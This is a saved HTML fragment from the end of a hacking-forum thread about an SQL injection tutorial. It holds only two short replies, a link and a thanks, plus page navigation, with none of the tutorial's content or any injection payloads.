<a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;pid=33666334#pid33666334">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,164<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">215</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33666334"><blockquote><cite><span>(07-01-2013 12:14 AM)</span>Suved Wrote: <a href="http://www.hackforums.net/showthread.php?pid=33650964#pid33650964" class="quick_jump">►</a></cite>^That part of challenge is simple.<br>The real deal is numbering tables.</blockquote><br>Are you sure?<br><a href="http://www.hackforums.net/showthread.php?tid=3590961" target="_blank">http://www.hackforums.net/showthread.php?tid=3590961</a></div><div class="post_meta" id="post_meta_33666334"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441&amp;replyto=33666334" class="bitButton" rel="nofollow">Quote</a> </div></td></tr></tbody></table><a name="pid33674145" id="pid33674145"></a><table class="tborder" style="margin-top: 5px; " id="post_33674145" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-02-2013, 01:30 AM <span id="edited_by_33674145"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;pid=33674145#pid33674145">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1871731"><span style="color:#383838">Zelonia</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 33<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1871731"><strong class="reputation_positive">7</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33674145">thanks for share mate, you are the best :)</div><div class="post_meta" id="post_meta_33674145"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1871731" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441&amp;replyto=33674145" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3588441&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3588441" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3588441">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3588441" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3588441&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3588441.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20Using%20Flow%20Control%20functions_statements%20in%20SQLi%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->